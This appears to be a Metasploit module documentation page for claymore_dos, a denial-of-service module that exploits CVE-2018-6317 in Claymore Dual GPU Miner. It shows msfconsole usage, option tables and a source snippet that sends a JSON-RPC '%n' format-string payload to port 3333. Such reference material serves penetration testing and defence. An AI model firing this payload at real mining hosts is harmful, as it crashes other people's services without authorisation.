Claymore Dual GPU Miner Format String dos attack - Metasploit


This page contains detailed information about how to use the auxiliary/dos/tcp/claymore_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Claymore Dual GPU Miner Format String dos attack
Module: auxiliary/dos/tcp/claymore_dos
Source code: modules/auxiliary/dos/tcp/claymore_dos.py
Disclosure date: 2018-02-06
Last modification time: 2021-05-17 17:04:49 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 3333
List of CVEs: CVE-2018-6317

Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/tcp/claymore_dos
msf auxiliary(claymore_dos) > show targets
    ... a list of targets ...
msf auxiliary(claymore_dos) > set TARGET target-id
msf auxiliary(claymore_dos) > show options
    ... show and set options ...
msf auxiliary(claymore_dos) > exploit

Required Options


  • rhost: The target address

Go back to menu.

Msfconsole Usage


Here is how the dos/tcp/claymore_dos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/tcp/claymore_dos

msf6 auxiliary(dos/tcp/claymore_dos) > show info

       Name: Claymore Dual GPU Miner  Format String dos attack
     Module: auxiliary/dos/tcp/claymore_dos
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-02-06

Provided by:
  res1n
  bluebird

Check supported:
  No

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  rhost                   yes       The target address
  rport  3333             yes       The target port

Description:
  Claymore���s Dual GPU Miner 10.5 and below is vulnerable to a format 
  strings vulnerability. This allows an unauthenticated attacker to 
  read memory addresses, or immediately terminate the mining process 
  causing a denial of service.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-6317
  https://www.exploit-db.com/exploits/43972
  https://github.com/nanopool/Claymore-Dual-Miner

Module Options


This is a complete list of options available in the dos/tcp/claymore_dos auxiliary module:

msf6 auxiliary(dos/tcp/claymore_dos) > show options

Module options (auxiliary/dos/tcp/claymore_dos):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   rhost                   yes       The target address
   rport  3333             yes       The target port

Advanced Options


Here is a complete list of advanced options supported by the dos/tcp/claymore_dos auxiliary module:

msf6 auxiliary(dos/tcp/claymore_dos) > show advanced

Module advanced options (auxiliary/dos/tcp/claymore_dos):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/tcp/claymore_dos module can do:

msf6 auxiliary(dos/tcp/claymore_dos) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/tcp/claymore_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/tcp/claymore_dos) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

connect error exit


Here is a relevant code snippet related to the "connect error exit" error message:

44:	    exp = json.dumps({'id': 1, 'jsonrpc': '1.0', 'method': '%n'}).encode()
45:	    try:
46:	        s = socket.create_connection((host, port), 10)
47:	        s.send(exp)
48:	        s.close()
49:	    except socket.error:
50:	        module.log("connect error exit")
51:	
52:	
53:	if __name__ == "__main__":
54:	    module.run(metadata, run)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • res1n
  • bluebird

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.